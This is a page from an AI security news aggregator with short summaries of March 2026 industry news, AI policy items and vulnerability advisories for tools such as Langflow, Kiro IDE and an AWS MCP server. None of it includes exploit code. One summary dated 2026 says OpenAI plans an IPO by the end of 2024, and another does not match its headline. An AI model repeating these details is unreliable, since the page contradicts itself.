aisecwatch.com
DashboardVulnerabilitiesNewsResearchArchiveStatsDataset
aisecwatch.com

Real-time AI security monitoring. Tracking AI-related vulnerabilities, safety and security incidents, privacy risks, research developments, and policy changes.

Navigation

VulnerabilitiesNewsResearchDigest ArchiveNewsletter ArchiveSubscribeData SourcesStatisticsDatasetAPIIntegrationsWidgetRSS Feed

Maintained by

Truong (Jack) Luu

Information Systems Researcher

AI Sec Watch

The security intelligence platform for AI teams

AI security threats move fast and get buried under hype and noise. Built by an Information Systems Security researcher to help security teams and developers stay ahead of vulnerabilities, privacy incidents, safety research, and policy developments.

[TOTAL_TRACKED]
2,649
[LAST_24H]
0
[LAST_7D]
157
Daily BriefingSaturday, March 28, 2026
>

OpenAI Shuts Down Sora Video App Over Profitability Concerns: OpenAI discontinued its Sora video-generation app and canceled a $1 billion Disney partnership because the service consumed too many computational resources without generating enough revenue to justify costs as the company prioritizes profitability.

>

Critical Injection Vulnerability in localGPT LLM Tool: CVE-2026-5002 allows remote injection attacks (inserting malicious code into input) through the LLM Prompt Handler in PromtEngineer localGPT's backend. The exploit code is publicly available, and the vendor has not responded to disclosure attempts.

>

Latest Intel

page 25/265
VIEW ALL
01

Nvidia CEO Jensen Huang says OpenClaw is 'definitely the next ChatGPT'

industry
Mar 17, 2026

Nvidia CEO Jensen Huang highlighted OpenClaw, an open-source autonomous AI agent platform (a system that can complete tasks and make decisions with minimal human input, unlike traditional chatbots), calling it "the next ChatGPT" and a major breakthrough in AI interaction. Nvidia launched NemoClaw, an enterprise version of OpenClaw that adds security, scalability, and oversight tools to make these autonomous agents safe for real-world business use, addressing concerns about security, privacy, and control as these systems gain the ability to act independently.

Critical This Week5 issues
critical

CVE-2026-33873: Langflow is a tool for building and deploying AI-powered agents and workflows. Prior to version 1.9.0, the Agentic Assis

CVE-2026-33873NVD/CVE DatabaseMar 27, 2026
Mar 27, 2026

Political Deepfakes Gain Influence Despite Public Awareness: AI researchers found that creators use generative AI (technology that creates images or videos from text descriptions) to produce fake media of political figures for propaganda and profit, and these deepfakes shape public perception even when viewers know the content is fake.

>

TikTok's AI Ad Labels Failing in Practice: Major companies like Samsung are posting AI-generated ads on TikTok without the required disclosure labels, preventing users from identifying whether advertisements were created by AI or humans despite platform policies requiring transparency.

Fix: Nvidia addressed risks with NemoClaw by building "guardrails, including privacy protections, oversight tools, and enterprise-grade security to ensure these agents can be deployed safely at scale."

CNBC Technology
02

The Pentagon is planning for AI companies to train on classified data, defense official says

policysecurity
Mar 17, 2026

The Pentagon is planning to let AI companies train their models on classified military data in secure facilities, which would allow the AI to learn from and embed sensitive intelligence like surveillance reports. While this could make AI systems more accurate for military tasks, experts warn it creates risks: classified information that the AI learns could accidentally be shared with people or military departments that shouldn't have access to it, potentially endangering operatives or exposing secrets.

MIT Technology Review
03

OpenAI preps for IPO by end of year, tells employees ChatGPT must be 'productivity tool'

industry
Mar 17, 2026

OpenAI is preparing for an initial public offering (IPO, where a private company sells shares to the public) potentially by the end of 2024, with leadership telling employees that ChatGPT must focus on being a productivity tool for businesses. The company is shifting strategy to convert its 900 million weekly users into enterprise customers and has scaled back its infrastructure spending targets from $1.4 trillion to $600 billion by 2030 to present a more realistic financial picture to investors.

CNBC Technology
04

GHSA-2cpp-j2fc-qhp7: AWS API MCP File Access Restriction Bypass

security
Mar 17, 2026

The AWS API MCP Server (a tool that lets AI assistants interact with AWS services) has a vulnerability in versions 0.2.14 through 1.3.8 where attackers can bypass file access restrictions and read files they shouldn't be able to access, even when the server is configured to block file operations or limit them to a specific directory.

Fix: Upgrade to version 1.3.9 or later.

GitHub Advisory Database
05

GHSA-vwmf-pq79-vjvx: Unauthenticated Remote Code Execution in Langflow via Public Flow Build Endpoint

security
Mar 17, 2026

Langflow has an unauthenticated remote code execution vulnerability in its public flow build endpoint. The endpoint is designed to be public but incorrectly accepts attacker-supplied flow data containing arbitrary Python code, which gets executed without sandboxing when the flow is built. An attacker only needs to know a public flow's ID and can exploit this to run any code on the server.

GitHub Advisory Database
06

GPT-5.4 mini and GPT-5.4 nano, which can describe 76,000 photos for $52

industry
Mar 17, 2026

OpenAI released two new smaller AI models, GPT-5.4 mini and GPT-5.4 nano, that are cheaper and faster than previous versions. GPT-5.4 nano is particularly affordable at $0.20 per million input tokens, making it economical for tasks like image description, where describing 76,000 photos would cost around $52.

Simon Willison's Weblog
07

Nvidia NemoClaw promises to run OpenClaw agents securely

securityindustry
Mar 17, 2026

OpenClaw, a framework for running AI agents (autonomous programs that can take actions) locally on devices rather than in the cloud, has faced security concerns since its rapid rise in early 2026. Nvidia announced NemoClaw, which addresses these vulnerabilities by using OpenShell, a security layer that includes kernel-level sandboxing (isolating programs from the core system) and a privacy router that monitors and blocks unauthorized data transfers by OpenClaw.

Fix: NemoClaw's OpenShell runtime isolates OpenClaw using kernel-level sandboxing and a 'privacy router' that monitors OpenClaw's behavior and communication with other systems, stepping in to block actions if it detects OpenClaw sending sensitive data somewhere it shouldn't. OpenShell is fully open source.

CSO Online
08

llm 0.29

industry
Mar 17, 2026

This is a monthly briefing about LLM (large language model) developments from March 2026, curated by Simon Willison. The content appears to be a sponsorship announcement for a paid email digest service rather than a discussion of a specific AI issue or vulnerability.

Simon Willison's Weblog
09

Arbitrary code execution via crafted project files in Kiro IDE

security
Mar 17, 2026

Kiro IDE, an AI-powered development environment for building autonomous software agents, has a vulnerability (CVE-2026-4295) that allows arbitrary code execution (running unintended commands on a system) when users open malicious project files. The flaw exists in versions before 0.8.0 due to improper trust boundary enforcement (failing to verify that data comes from a safe source).

AWS Security Bulletins
10

What the EU AI Act Means for Staffing Businesses

policy
Mar 17, 2026

The EU AI Act, effective August 2, 2026, classifies AI systems used in hiring and employment decisions (such as candidate screening, ranking, and performance monitoring) as high-risk and requires businesses that deploy them to conduct risk assessments, perform bias testing, maintain human oversight, and provide transparency disclosures. Staffing companies, recruitment platforms, and workforce intermediaries are responsible for compliance even if they did not build the technology, and this obligation applies globally if the AI system affects anyone in the EU.

EU AI Act Updates
Prev1...2324252627...265Next
critical

Attackers exploit critical Langflow RCE within hours as CISA sounds alarm

CSO OnlineMar 27, 2026
Mar 27, 2026
critical

CVE-2025-53521: F5 BIG-IP Unspecified Vulnerability

CVE-2025-53521CISA Known Exploited VulnerabilitiesMar 26, 2026
Mar 26, 2026
critical

CISA: New Langflow flaw actively exploited to hijack AI workflows

BleepingComputerMar 26, 2026
Mar 26, 2026
critical

GHSA-mxrg-77hm-89hv: n8n: Prototype Pollution in XML and GSuiteAdmin node parameters lead to RCE

CVE-2026-33696GitHub Advisory DatabaseMar 26, 2026
Mar 26, 2026